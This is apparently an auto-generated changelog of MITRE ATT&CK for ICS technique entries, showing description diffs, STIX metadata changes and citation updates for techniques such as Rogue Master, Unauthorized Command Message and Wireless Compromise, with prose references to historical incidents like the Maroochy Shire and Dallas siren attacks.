external_references{'source_name': 'Marshall Abrams July 2008', 'description': 'Marshall Abrams 2008, July 23 Malicious Control System Cyber Security Attack Case Study Maroochy Water Services, Australia Retrieved. 2018/03/27 ', 'url': 'https://web.archive.org/web/20200802103218/https://www.mitre.org/sites/default/files/pdf/08_1145.pdf'}

[T0848] Rogue Master

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description
New Description
t1Adversaries may setup a rogue master to leverage control sert1Adversaries may setup a rogue master to leverage control ser
>ver functions to communicate with outstations. A rogue maste>ver functions to communicate with outstations. A rogue maste
>r can be used to send legitimate control messages to other c>r can be used to send legitimate control messages to other c
>ontrol system devices, affecting processes in unintended way>ontrol system devices, affecting processes in unintended way
>s. It may also be used to disrupt network communications by >s. It may also be used to disrupt network communications by 
>capturing and receiving the network traffic meant for the ac>capturing and receiving the network traffic meant for the ac
>tual master. Impersonating a master may also allow an advers>tual master. Impersonating a master may also allow an advers
>ary to avoid detection.   In the Maroochy Shire attack, the >ary to avoid detection.   In the case of the 2017 Dallas Sir
>adversary falsified network addresses in order to send false>en incident, adversaries used a rogue master to send command
> data and instructions to pumping stations.(Citation: Marsha> messages to the 156 distributed sirens across the city, eit
>ll Abrams July 2008)  In the case of the 2017 Dallas Siren i>her through a single rogue transmitter with a strong signal,
>ncident, adversaries used a rogue master to send command mes> or using many distributed repeaters. (Citation: Bastille Ap
>sages to the 156 distributed sirens across the city, either >ril 2017) (Citation: Zack Whittaker April 2017)
>through a single rogue transmitter with a strong signal, or  
>using many distributed repeaters. (Citation: Bastille April  
>2017) (Citation: Zack Whittaker April 2017) 
Details
values_changed
STIX FieldOld valueNew Value
modified2022-10-20 18:11:21.376000+00:002023-03-30 20:18:41.277000+00:00
descriptionAdversaries may setup a rogue master to leverage control server functions to communicate with outstations. A rogue master can be used to send legitimate control messages to other control system devices, affecting processes in unintended ways. It may also be used to disrupt network communications by capturing and receiving the network traffic meant for the actual master. Impersonating a master may also allow an adversary to avoid detection. In the Maroochy Shire attack, the adversary falsified network addresses in order to send false data and instructions to pumping stations.(Citation: Marshall Abrams July 2008) In the case of the 2017 Dallas Siren incident, adversaries used a rogue master to send command messages to the 156 distributed sirens across the city, either through a single rogue transmitter with a strong signal, or using many distributed repeaters. (Citation: Bastille April 2017) (Citation: Zack Whittaker April 2017)Adversaries may setup a rogue master to leverage control server functions to communicate with outstations. A rogue master can be used to send legitimate control messages to other control system devices, affecting processes in unintended ways. It may also be used to disrupt network communications by capturing and receiving the network traffic meant for the actual master. Impersonating a master may also allow an adversary to avoid detection. In the case of the 2017 Dallas Siren incident, adversaries used a rogue master to send command messages to the 156 distributed sirens across the city, either through a single rogue transmitter with a strong signal, or using many distributed repeaters. (Citation: Bastille April 2017) (Citation: Zack Whittaker April 2017)
kill_chain_phases[0]['phase_name']initial-access-icsinitial-access
external_references[2]['source_name']Marshall Abrams July 2008Zack Whittaker April 2017
external_references[2]['description']Marshall Abrams 2008, July 23 Malicious Control System Cyber Security Attack Case Study Maroochy Water Services, Australia Retrieved. 2018/03/27 Zack Whittaker 2017, April 12 Dallas' emergency sirens were hacked with a rogue radio signal Retrieved. 2020/11/06
external_references[2]['url']https://web.archive.org/web/20200802103218/https://www.mitre.org/sites/default/files/pdf/08_1145.pdfhttps://www.zdnet.com/article/experts-think-they-know-how-dallas-emergency-sirens-were-hacked/
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_data_sources[0]Application Log: Application Log ContentNetwork Traffic: Network Traffic Content
x_mitre_data_sources[1]Asset: Asset InventoryOperational Databases: Device Alarm
x_mitre_data_sources[2]Operational Databases: Device AlarmAsset: Asset Inventory
x_mitre_data_sources[3]Network Traffic: Network Traffic ContentNetwork Traffic: Network Traffic Flow
x_mitre_data_sources[4]Network Traffic: Network Traffic FlowApplication Log: Application Log Content
x_mitre_version1.11.2
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'Zack Whittaker April 2017', 'description': "Zack Whittaker 2017, April 12 Dallas' emergency sirens were hacked with a rogue radio signal Retrieved. 2020/11/06 ", 'url': 'https://www.zdnet.com/article/experts-think-they-know-how-dallas-emergency-sirens-were-hacked/'}

[T0856] Spoof Reporting Message

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description
New Description
t1Adversaries may spoof reporting messages in control system et1Adversaries may spoof reporting messages in control system e
>nvironments for evasion and to impair process control. In co>nvironments for evasion and to impair process control. In co
>ntrol systems, reporting messages contain telemetry data (e.>ntrol systems, reporting messages contain telemetry data (e.
>g., I/O values) pertaining to the current state of equipment>g., I/O values) pertaining to the current state of equipment
> and the industrial process. Reporting messages are importan> and the industrial process. Reporting messages are importan
>t for monitoring the normal operation of a system or identif>t for monitoring the normal operation of a system or identif
>ying important events such as deviations from expected value>ying important events such as deviations from expected value
>s.   If an adversary has the ability to Spoof Reporting Mess>s.   If an adversary has the ability to Spoof Reporting Mess
>ages, they can impact the control system in many ways. The a>ages, they can impact the control system in many ways. The a
>dversary can Spoof Reporting Messages that state that the pr>dversary can Spoof Reporting Messages that state that the pr
>ocess is operating normally, as a form of evasion. The adver>ocess is operating normally, as a form of evasion. The adver
>sary could also Spoof Reporting Messages to make the defende>sary could also Spoof Reporting Messages to make the defende
>rs and operators think that other errors are occurring in or>rs and operators think that other errors are occurring in or
>der to distract them from the actual source of a problem. (C>der to distract them from the actual source of a problem. (C
>itation: Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011)   >itation: Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011) 
>In the Maroochy Shire attack, the adversary used a dedicated 
> analog two-way radio system to send false data and instruct 
>ions to pumping stations and the central computer.(Citation: 
> Marshall Abrams July 2008) 
Details
values_changed
STIX FieldOld valueNew Value
modified2022-10-20 18:16:21.548000+00:002023-03-30 20:19:14.351000+00:00
descriptionAdversaries may spoof reporting messages in control system environments for evasion and to impair process control. In control systems, reporting messages contain telemetry data (e.g., I/O values) pertaining to the current state of equipment and the industrial process. Reporting messages are important for monitoring the normal operation of a system or identifying important events such as deviations from expected values. If an adversary has the ability to Spoof Reporting Messages, they can impact the control system in many ways. The adversary can Spoof Reporting Messages that state that the process is operating normally, as a form of evasion. The adversary could also Spoof Reporting Messages to make the defenders and operators think that other errors are occurring in order to distract them from the actual source of a problem. (Citation: Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011) In the Maroochy Shire attack, the adversary used a dedicated analog two-way radio system to send false data and instructions to pumping stations and the central computer.(Citation: Marshall Abrams July 2008)Adversaries may spoof reporting messages in control system environments for evasion and to impair process control. In control systems, reporting messages contain telemetry data (e.g., I/O values) pertaining to the current state of equipment and the industrial process. Reporting messages are important for monitoring the normal operation of a system or identifying important events such as deviations from expected values. If an adversary has the ability to Spoof Reporting Messages, they can impact the control system in many ways. The adversary can Spoof Reporting Messages that state that the process is operating normally, as a form of evasion. The adversary could also Spoof Reporting Messages to make the defenders and operators think that other errors are occurring in order to distract them from the actual source of a problem. (Citation: Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011)
kill_chain_phases[0]['phase_name']evasion-icsevasion
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_data_sources[0]Network Traffic: Network Traffic FlowNetwork Traffic: Network Traffic Content
x_mitre_data_sources[1]Operational Databases: Device AlarmWindows Registry: Windows Registry Key Modification
x_mitre_data_sources[2]Windows Registry: Windows Registry Key ModificationOperational Databases: Device Alarm
x_mitre_data_sources[3]Network Traffic: Network Traffic ContentNetwork Traffic: Network Traffic Flow
x_mitre_version1.11.2
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'Marshall Abrams July 2008', 'description': 'Marshall Abrams 2008, July 23 Malicious Control System Cyber Security Attack Case Study Maroochy Water Services, Australia Retrieved. 2018/03/27 ', 'url': 'https://web.archive.org/web/20200802103218/https://www.mitre.org/sites/default/files/pdf/08_1145.pdf'}

[T0864] Transient Cyber Asset

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description
New Description
t1Adversaries may target devices that are transient across ICSt1Adversaries may target devices that are transient across ICS
> networks and external networks. Normally, transient assets > networks and external networks. Normally, transient assets 
>are brought into an environment by authorized personnel and >are brought into an environment by authorized personnel and 
>do not remain in that environment on a permanent basis. (Cit>do not remain in that environment on a permanent basis. (Cit
>ation: North American Electric Reliability Corporation June >ation: North American Electric Reliability Corporation June 
>2021) Transient assets are commonly needed to support manage>2021) Transient assets are commonly needed to support manage
>ment functions and may be more common in systems where a rem>ment functions and may be more common in systems where a rem
>otely managed asset is not feasible, external connections fo>otely managed asset is not feasible, external connections fo
>r remote access do not exist, or 3rd party contractor/vendor>r remote access do not exist, or 3rd party contractor/vendor
> access is required.   Adversaries may take advantage of tra> access is required.   Adversaries may take advantage of tra
>nsient assets in different ways. For instance, adversaries m>nsient assets in different ways. For instance, adversaries m
>ay target a transient asset when it is connected to an exter>ay target a transient asset when it is connected to an exter
>nal network and then leverage its trusted access in another >nal network and then leverage its trusted access in another 
>environment to launch an attack. They may also take advantag>environment to launch an attack. They may also take advantag
>e of installed applications and libraries that are used by l>e of installed applications and libraries that are used by l
>egitimate end-users to interact with control system devices.>egitimate end-users to interact with control system devices.
>   Transient assets, in some cases, may not be deployed with>   Transient assets, in some cases, may not be deployed with
> a secure configuration leading to weaknesses that could all> a secure configuration leading to weaknesses that could all
>ow an adversary to propagate malicious executable code, e.g.>ow an adversary to propagate malicious executable code, e.g.
>, the transient asset may be infected by malware and when co>, the transient asset may be infected by malware and when co
>nnected to an ICS environment the malware propagates onto ot>nnected to an ICS environment the malware propagates onto ot
>her systems.   In the Maroochy Shire attack, the adversary u>her systems. 
>tilized a computer, possibly stolen, with proprietary engine 
>ering software to communicate with a wastewater system.(Cita 
>tion: Marshall Abrams July 2008) 
Details
values_changed
STIX FieldOld valueNew Value
modified2022-10-20 18:13:19.252000+00:002023-03-30 20:19:41.272000+00:00
descriptionAdversaries may target devices that are transient across ICS networks and external networks. Normally, transient assets are brought into an environment by authorized personnel and do not remain in that environment on a permanent basis. (Citation: North American Electric Reliability Corporation June 2021) Transient assets are commonly needed to support management functions and may be more common in systems where a remotely managed asset is not feasible, external connections for remote access do not exist, or 3rd party contractor/vendor access is required. Adversaries may take advantage of transient assets in different ways. For instance, adversaries may target a transient asset when it is connected to an external network and then leverage its trusted access in another environment to launch an attack. They may also take advantage of installed applications and libraries that are used by legitimate end-users to interact with control system devices. Transient assets, in some cases, may not be deployed with a secure configuration leading to weaknesses that could allow an adversary to propagate malicious executable code, e.g., the transient asset may be infected by malware and when connected to an ICS environment the malware propagates onto other systems. In the Maroochy Shire attack, the adversary utilized a computer, possibly stolen, with proprietary engineering software to communicate with a wastewater system.(Citation: Marshall Abrams July 2008)Adversaries may target devices that are transient across ICS networks and external networks. Normally, transient assets are brought into an environment by authorized personnel and do not remain in that environment on a permanent basis. (Citation: North American Electric Reliability Corporation June 2021) Transient assets are commonly needed to support management functions and may be more common in systems where a remotely managed asset is not feasible, external connections for remote access do not exist, or 3rd party contractor/vendor access is required. Adversaries may take advantage of transient assets in different ways. For instance, adversaries may target a transient asset when it is connected to an external network and then leverage its trusted access in another environment to launch an attack. They may also take advantage of installed applications and libraries that are used by legitimate end-users to interact with control system devices. Transient assets, in some cases, may not be deployed with a secure configuration leading to weaknesses that could allow an adversary to propagate malicious executable code, e.g., the transient asset may be infected by malware and when connected to an ICS environment the malware propagates onto other systems.
kill_chain_phases[0]['phase_name']initial-access-icsinitial-access
external_references[1]['source_name']Marshall Abrams July 2008North American Electric Reliability Corporation June 2021
external_references[1]['description']Marshall Abrams 2008, July 23 Malicious Control System Cyber Security Attack Case Study Maroochy Water Services, Australia Retrieved. 2018/03/27 North American Electric Reliability Corporation 2021, June 28 Glossary of Terms Used in NERC Reliability Standards Retrieved. 2021/10/11
external_references[1]['url']https://web.archive.org/web/20200802103218/https://www.mitre.org/sites/default/files/pdf/08_1145.pdfhttps://www.nerc.com/files/glossary_of_terms.pdf
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_data_sources[0]Application Log: Application Log ContentNetwork Traffic: Network Traffic Flow
x_mitre_data_sources[1]Network Traffic: Network Traffic FlowApplication Log: Application Log Content
x_mitre_version1.11.2
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'North American Electric Reliability Corporation June 2021', 'description': 'North American Electric Reliability Corporation 2021, June 28 Glossary of Terms Used in NERC Reliability Standards Retrieved. 2021/10/11 ', 'url': 'https://www.nerc.com/files/glossary_of_terms.pdf'}

[T0855] Unauthorized Command Message

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description
New Description
t1Adversaries may send unauthorized command messages to instrut1Adversaries may send unauthorized command messages to instru
>ct control system assets to perform actions outside of their>ct control system assets to perform actions outside of their
> intended functionality, or without the logical precondition> intended functionality, or without the logical precondition
>s to trigger their expected function. Command messages are u>s to trigger their expected function. Command messages are u
>sed in ICS networks to give direct instructions to control s>sed in ICS networks to give direct instructions to control s
>ystems devices. If an adversary can send an unauthorized com>ystems devices. If an adversary can send an unauthorized com
>mand message to a control system, then it can instruct the c>mand message to a control system, then it can instruct the c
>ontrol systems device to perform an action outside the norma>ontrol systems device to perform an action outside the norma
>l bounds of the device's actions. An adversary could potenti>l bounds of the device's actions. An adversary could potenti
>ally instruct a control systems device to perform an action >ally instruct a control systems device to perform an action 
>that will cause an [Impact](https://attack.mitre.org/tactics>that will cause an [Impact](https://attack.mitre.org/tactics
>/TA0105). (Citation: Bonnie Zhu, Anthony Joseph, Shankar Sas>/TA0105). (Citation: Bonnie Zhu, Anthony Joseph, Shankar Sas
>try 2011)  In the Maroochy Shire attackthe adversary used >try 2011)  In the Dallas Siren incident, adversaries were ab
>a dedicated analog two-way radio system to send false data a>le to send command messages to activate tornado alarm system
>nd instructions to pumping stations and the central computer>s across the city without an impending tornado or other disa
>.(Citation: Marshall Abrams July 2008)  In the Dallas Siren >ster. (Citation: Zack Whittaker April 2017) (Citation: Benja
>incident, adversaries were able to send command messages to >min Freed March 2019)
>activate tornado alarm systems across the city without an im 
>pending tornado or other disaster. (Citation: Zack Whittaker 
> April 2017) (Citation: Benjamin Freed March 2019) 

New Mitigations:

Details
values_changed
STIX FieldOld valueNew Value
modified2022-10-20 18:10:48.892000+00:002023-04-05 14:16:02.811000+00:00
descriptionAdversaries may send unauthorized command messages to instruct control system assets to perform actions outside of their intended functionality, or without the logical preconditions to trigger their expected function. Command messages are used in ICS networks to give direct instructions to control systems devices. If an adversary can send an unauthorized command message to a control system, then it can instruct the control systems device to perform an action outside the normal bounds of the device's actions. An adversary could potentially instruct a control systems device to perform an action that will cause an [Impact](https://attack.mitre.org/tactics/TA0105). (Citation: Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011) In the Maroochy Shire attack, the adversary used a dedicated analog two-way radio system to send false data and instructions to pumping stations and the central computer.(Citation: Marshall Abrams July 2008) In the Dallas Siren incident, adversaries were able to send command messages to activate tornado alarm systems across the city without an impending tornado or other disaster. (Citation: Zack Whittaker April 2017) (Citation: Benjamin Freed March 2019)Adversaries may send unauthorized command messages to instruct control system assets to perform actions outside of their intended functionality, or without the logical preconditions to trigger their expected function. Command messages are used in ICS networks to give direct instructions to control systems devices. If an adversary can send an unauthorized command message to a control system, then it can instruct the control systems device to perform an action outside the normal bounds of the device's actions. An adversary could potentially instruct a control systems device to perform an action that will cause an [Impact](https://attack.mitre.org/tactics/TA0105). (Citation: Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011) In the Dallas Siren incident, adversaries were able to send command messages to activate tornado alarm systems across the city without an impending tornado or other disaster. (Citation: Zack Whittaker April 2017) (Citation: Benjamin Freed March 2019)
external_references[3]['source_name']Marshall Abrams July 2008Zack Whittaker April 2017
external_references[3]['description']Marshall Abrams 2008, July 23 Malicious Control System Cyber Security Attack Case Study Maroochy Water Services, Australia Retrieved. 2018/03/27 Zack Whittaker 2017, April 12 Dallas' emergency sirens were hacked with a rogue radio signal Retrieved. 2020/11/06
external_references[3]['url']https://web.archive.org/web/20200802103218/https://www.mitre.org/sites/default/files/pdf/08_1145.pdfhttps://www.zdnet.com/article/experts-think-they-know-how-dallas-emergency-sirens-were-hacked/
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_data_sources[0]Application Log: Application Log ContentNetwork Traffic: Network Traffic Content
x_mitre_data_sources[1]Operational Databases: Process/Event AlarmApplication Log: Application Log Content
x_mitre_data_sources[2]Operational Databases: Process History/Live DataOperational Databases: Process/Event Alarm
x_mitre_data_sources[4]Network Traffic: Network Traffic ContentOperational Databases: Process History/Live Data
x_mitre_version1.11.2
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'Zack Whittaker April 2017', 'description': "Zack Whittaker 2017, April 12 Dallas' emergency sirens were hacked with a rogue radio signal Retrieved. 2020/11/06 ", 'url': 'https://www.zdnet.com/article/experts-think-they-know-how-dallas-emergency-sirens-were-hacked/'}

[T0860] Wireless Compromise

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description
New Description
t1Adversaries may perform wireless compromise as a method of gt1Adversaries may perform wireless compromise as a method of g
>aining communications and unauthorized access to a wireless >aining communications and unauthorized access to a wireless 
>network. Access to a wireless network may be gained through >network. Access to a wireless network may be gained through 
>the compromise of a wireless device. (Citation: Alexander Bo>the compromise of a wireless device. (Citation: Alexander Bo
>lshev, Gleb Cherbov July 2014) (Citation: Alexander Bolshev >lshev, Gleb Cherbov July 2014) (Citation: Alexander Bolshev 
>March 2014) Adversaries may also utilize radios and other wi>March 2014) Adversaries may also utilize radios and other wi
>reless communication devices on the same frequency as the wi>reless communication devices on the same frequency as the wi
>reless network. Wireless compromise can be done as an initia>reless network. Wireless compromise can be done as an initia
>l access vector from a remote distance.   In the Maroochy Sh>l access vector from a remote distance.   A Polish student u
>ire attack, the adversary used a two-way radio to communicat>sed a modified TV remote controller to gain access to and co
>e with and set the frequencies of Maroochy Shire's repeater >ntrol over the Lodz city tram system in Poland. (Citation: J
>stations.(Citation: Marshall Abrams July 2008)  A Polish stu>ohn Bill May 2017) (Citation: Shelley Smith February 2008) T
>dent used a modified TV remote controller to gain access to >he remote controller device allowed the student to interface
>and control over the Lodz city tram system in Poland. (Citat> with the trams network to modify track settings and overrid
>ion: John Bill May 2017) (Citation: Shelley Smith February 2>e operator control. The adversary may have accomplished this
>008) The remote controller device allowed the student to int> by aligning the controller to the frequency and amplitude o
>erface with the trams network to modify track settings and o>f IR control protocol signals. (Citation: Bruce Schneier Jan
>verride operator control. The adversary may have accomplishe>uary 2008) The controller then enabled initial access to the
>d this by aligning the controller to the frequency and ampli> network, allowing the capture and replay of tram signals. (
>tude of IR control protocol signals. (Citation: Bruce Schnei>Citation: John Bill May 2017)
>er January 2008) The controller then enabled initial access  
>to the network, allowing the capture and replay of tram sign 
>als. (Citation: John Bill May 2017) 
Details
values_changed
STIX FieldOld valueNew Value
modified2022-10-20 20:40:16.860000+00:002023-03-30 20:20:38.285000+00:00
descriptionAdversaries may perform wireless compromise as a method of gaining communications and unauthorized access to a wireless network. Access to a wireless network may be gained through the compromise of a wireless device. (Citation: Alexander Bolshev, Gleb Cherbov July 2014) (Citation: Alexander Bolshev March 2014) Adversaries may also utilize radios and other wireless communication devices on the same frequency as the wireless network. Wireless compromise can be done as an initial access vector from a remote distance. In the Maroochy Shire attack, the adversary used a two-way radio to communicate with and set the frequencies of Maroochy Shire's repeater stations.(Citation: Marshall Abrams July 2008) A Polish student used a modified TV remote controller to gain access to and control over the Lodz city tram system in Poland. (Citation: John Bill May 2017) (Citation: Shelley Smith February 2008) The remote controller device allowed the student to interface with the trams network to modify track settings and override operator control. The adversary may have accomplished this by aligning the controller to the frequency and amplitude of IR control protocol signals. (Citation: Bruce Schneier January 2008) The controller then enabled initial access to the network, allowing the capture and replay of tram signals. (Citation: John Bill May 2017)Adversaries may perform wireless compromise as a method of gaining communications and unauthorized access to a wireless network. Access to a wireless network may be gained through the compromise of a wireless device. (Citation: Alexander Bolshev, Gleb Cherbov July 2014) (Citation: Alexander Bolshev March 2014) Adversaries may also utilize radios and other wireless communication devices on the same frequency as the wireless network. Wireless compromise can be done as an initial access vector from a remote distance. A Polish student used a modified TV remote controller to gain access to and control over the Lodz city tram system in Poland. (Citation: John Bill May 2017) (Citation: Shelley Smith February 2008) The remote controller device allowed the student to interface with the trams network to modify track settings and override operator control. The adversary may have accomplished this by aligning the controller to the frequency and amplitude of IR control protocol signals. (Citation: Bruce Schneier January 2008) The controller then enabled initial access to the network, allowing the capture and replay of tram signals. (Citation: John Bill May 2017)
kill_chain_phases[0]['phase_name']initial-access-icsinitial-access
external_references[5]['source_name']Marshall Abrams July 2008Shelley Smith February 2008
external_references[5]['description']Marshall Abrams 2008, July 23 Malicious Control System Cyber Security Attack Case Study Maroochy Water Services, Australia Retrieved. 2018/03/27 Shelley Smith 2008, February 12 Teen Hacker in Poland Plays Trains and Derails City Tram System Retrieved. 2019/10/17
external_references[5]['url']https://web.archive.org/web/20200802103218/https://www.mitre.org/sites/default/files/pdf/08_1145.pdfhttps://inhomelandsecurity.com/teen_hacker_in_poland_plays_tr/
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.11.2
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesApplication Log: Application Log Content
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'Shelley Smith February 2008', 'description': 'Shelley Smith 2008, February 12 Teen Hacker in Poland Plays Trains and Derails City Tram System Retrieved. 2019/10/17 ', 'url': 'https://inhomelandsecurity.com/teen_hacker_in_poland_plays_tr/'}
x_mitre_data_sourcesApplication Log: Application Log Content
Patches

[T0830] Adversary-in-the-Middle

Current version: 2.0

Details
values_changed
STIX FieldOld valueNew Value
modified2022-09-26 20:38:32.749000+00:002023-03-09 18:38:51.471000+00:00
kill_chain_phases[0]['phase_name']collection-icscollection
x_mitre_data_sources[2]Service: Service CreationProcess: Process Creation
x_mitre_data_sources[5]Process: Process CreationService: Service Creation
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesWindows Registry: Windows Registry Key Modification
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_data_sourcesWindows Registry: Windows Registry Key Modification

[T0802] Automated Collection

Current version: 1.0

Details
values_changed
STIX FieldOld valueNew Value
modified2022-10-24 15:09:07.609000+00:002023-03-09 18:38:51.471000+00:00
kill_chain_phases[0]['phase_name']collection-icscollection
x_mitre_data_sources[0]Network Traffic: Network Traffic ContentCommand: Command Execution
x_mitre_data_sources[1]File: File AccessNetwork Traffic: Network Traffic Content
x_mitre_data_sources[3]Command: Command ExecutionFile: File Access

[T0858] Change Operating Mode

Current version: 1.0

Details
values_changed
STIX FieldOld valueNew Value
modified2022-05-24 11:42:52.057000+00:002023-03-09 18:38:51.471000+00:00
kill_chain_phases[0]['phase_name']execution-icsexecution
kill_chain_phases[1]['phase_name']evasion-icsevasion
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_data_sources[0]Application Log: Application Log ContentNetwork Traffic: Network Traffic Content
x_mitre_data_sources[1]Network Traffic: Network Traffic ContentApplication Log: Application Log Content

[T0807] Command-Line Interface

Current version: 1.1

Details
values_changed
STIX FieldOld valueNew Value
modified2022-09-27 15:30:18.702000+00:002023-03-09 18:38:51.471000+00:00
kill_chain_phases[0]['phase_name']execution-icsexecution

[T0885] Commonly Used Port

Current version: 1.1

Details
values_changed
STIX FieldOld valueNew Value
modified2022-09-27 18:49:25.201000+00:002023-03-09 18:38:51.471000+00:00
kill_chain_phases[0]['phase_name']command-and-control-icscommand-and-control
x_mitre_data_sources[0]Network Traffic: Network Traffic FlowNetwork Traffic: Network Traffic Content
x_mitre_data_sources[1]Network Traffic: Network Traffic ContentNetwork Traffic: Network Traffic Flow

[T0884] Connection Proxy

Current version: 1.1

Details
values_changed
STIX FieldOld valueNew Value
modified2022-10-20 21:01:00.402000+00:002023-03-09 18:38:51.471000+00:00
kill_chain_phases[0]['phase_name']command-and-control-icscommand-and-control
x_mitre_data_sources[0]Network Traffic: Network Traffic ContentNetwork Traffic: Network Traffic Flow
x_mitre_data_sources[1]Network Traffic: Network Traffic FlowNetwork Traffic: Network Traffic Content

[T0812] Default Credentials

Current version: 1.0

Details
values_changed
STIX FieldOld valueNew Value
modified2022-09-19 14:07:23.199000+00:002023-03-09 18:38:51.471000+00:00
kill_chain_phases[0]['phase_name']lateral-movement-icslateral-movement

[T0868] Detect Operating Mode

Current version: 1.0


Old Description
New Description
t1Adversaries may gather information about a PLCs or controllet1Adversaries may gather information about a PLCs or controlle
>rs current operating mode. Operating modes dictate what chan>rs current operating mode. Operating modes dictate what chan
>ge or maintenance functions can be manipulated and are often>ge or maintenance functions can be manipulated and are often
> controlled by a key switch on the PLC (e.g.,  run, prog [pr> controlled by a key switch on the PLC (e.g.,  run, prog [pr
>ogram], and remote). Knowledge of these states may be valuab>ogram], and remote). Knowledge of these states may be valuab
>le to an adversary to determine if they are able to reprogra>le to an adversary to determine if they are able to reprogra
>m the PLC. Operating modes and the mechanisms by which they >m the PLC. Operating modes and the mechanisms by which they 
>are selected often vary by vendor and product line. Some com>are selected often vary by vendor and product line. Some com
>monly implemented operating modes are described below:    * >monly implemented operating modes are described below:    * 
>Program - This mode must be enabled before changes can be ma>Program - This mode must be enabled before changes can be ma
>de to a devices program. This allows program uploads and dow>de to a devices program. This allows program uploads and dow
>nloads between the device and an engineering workstation. Of>nloads between the device and an engineering workstation. Of
>ten the PLCs logic Is halted, and all outputs may be forced >ten the PLCs logic Is halted, and all outputs may be forced 
>off. (Citation: N.A. October 2017)   * Run - Execution of th>off. (Citation: N.A. October 2017)   * Run - Execution of th
>e devices program occurs in this mode. Input and output (val>e devices program occurs in this mode. Input and output (val
>ues, points, tags, elements, etc.) are monitored and used ac>ues, points, tags, elements, etc.) are monitored and used ac
>cording to the programs logic. [Program Upload](https://atta>cording to the programs logic.[Program Upload](https://attac
>ck.mitre.org/techniques/T0845) and [Program Download](https:>k.mitre.org/techniques/T0845) and [Program Download](https:/
>//attack.mitre.org/techniques/T0843) are disabled while in t>/attack.mitre.org/techniques/T0843) are disabled while in th
>his mode. (Citation: Omron) (Citation: Machine Information S>is mode. (Citation: Omron) (Citation: Machine Information Sy
>ystems 2007)  (Citation: N.A. October 2017) (Citation: PLCgu>stems 2007)  (Citation: N.A. October 2017) (Citation: PLCgur
>rus 2021)    * Remote - Allows for remote changes to a PLCs >us 2021)    * Remote - Allows for remote changes to a PLCs o
>operation mode. (Citation: PLCgurus 2021)     * Stop - The P>peration mode. (Citation: PLCgurus 2021)     * Stop - The PL
>LC and program is stopped, while in this mode, outputs are f>C and program is stopped, while in this mode, outputs are fo
>orced off. (Citation: Machine Information Systems 2007)    *>rced off. (Citation: Machine Information Systems 2007)    * 
> Reset - Conditions on the PLC are reset to their original s>Reset - Conditions on the PLC are reset to their original st
>tates. Warm resets may retain some memory while cold resets >ates. Warm resets may retain some memory while cold resets w
>will reset all I/O and data registers. (Citation: Machine In>ill reset all I/O and data registers. (Citation: Machine Inf
>formation Systems 2007)    * Test / Monitor mode - Similar t>ormation Systems 2007)    * Test / Monitor mode - Similar to
>o run mode, I/O is processed, although this mode allows for > run mode, I/O is processed, although this mode allows for m
>monitoring, force set, resets, and more generally tuning or >onitoring, force set, resets, and more generally tuning or d
>debugging of the system. Often monitor mode may be used as a>ebugging of the system. Often monitor mode may be used as a 
> trial for initialization. (Citation: Omron)>trial for initialization. (Citation: Omron)
Details
values_changed
STIX FieldOld valueNew Value
modified2022-05-24 11:48:05.134000+00:002023-03-09 18:38:51.471000+00:00
descriptionAdversaries may gather information about a PLCs or controllers current operating mode. Operating modes dictate what change or maintenance functions can be manipulated and are often controlled by a key switch on the PLC (e.g., run, prog [program], and remote). Knowledge of these states may be valuable to an adversary to determine if they are able to reprogram the PLC. Operating modes and the mechanisms by which they are selected often vary by vendor and product line. Some commonly implemented operating modes are described below: * Program - This mode must be enabled before changes can be made to a devices program. This allows program uploads and downloads between the device and an engineering workstation. Often the PLCs logic Is halted, and all outputs may be forced off. (Citation: N.A. October 2017) * Run - Execution of the devices program occurs in this mode. Input and output (values, points, tags, elements, etc.) are monitored and used according to the programs logic. [Program Upload](https://attack.mitre.org/techniques/T0845) and [Program Download](https://attack.mitre.org/techniques/T0843) are disabled while in this mode. (Citation: Omron) (Citation: Machine Information Systems 2007) (Citation: N.A. October 2017) (Citation: PLCgurus 2021) * Remote - Allows for remote changes to a PLCs operation mode. (Citation: PLCgurus 2021) * Stop - The PLC and program is stopped, while in this mode, outputs are forced off. (Citation: Machine Information Systems 2007) * Reset - Conditions on the PLC are reset to their original states. Warm resets may retain some memory while cold resets will reset all I/O and data registers. (Citation: Machine Information Systems 2007) * Test / Monitor mode - Similar to run mode, I/O is processed, although this mode allows for monitoring, force set, resets, and more generally tuning or debugging of the system. Often monitor mode may be used as a trial for initialization. (Citation: Omron)Adversaries may gather information about a PLCs or controllers current operating mode. Operating modes dictate what change or maintenance functions can be manipulated and are often controlled by a key switch on the PLC (e.g., run, prog [program], and remote). Knowledge of these states may be valuable to an adversary to determine if they are able to reprogram the PLC. Operating modes and the mechanisms by which they are selected often vary by vendor and product line. Some commonly implemented operating modes are described below: * Program - This mode must be enabled before changes can be made to a devices program. This allows program uploads and downloads between the device and an engineering workstation. Often the PLCs logic Is halted, and all outputs may be forced off. (Citation: N.A. October 2017) * Run - Execution of the devices program occurs in this mode. Input and output (values, points, tags, elements, etc.) are monitored and used according to the programs logic.[Program Upload](https://attack.mitre.org/techniques/T0845) and [Program Download](https://attack.mitre.org/techniques/T0843) are disabled while in this mode. (Citation: Omron) (Citation: Machine Information Systems 2007) (Citation: N.A. October 2017) (Citation: PLCgurus 2021) * Remote - Allows for remote changes to a PLCs operation mode. 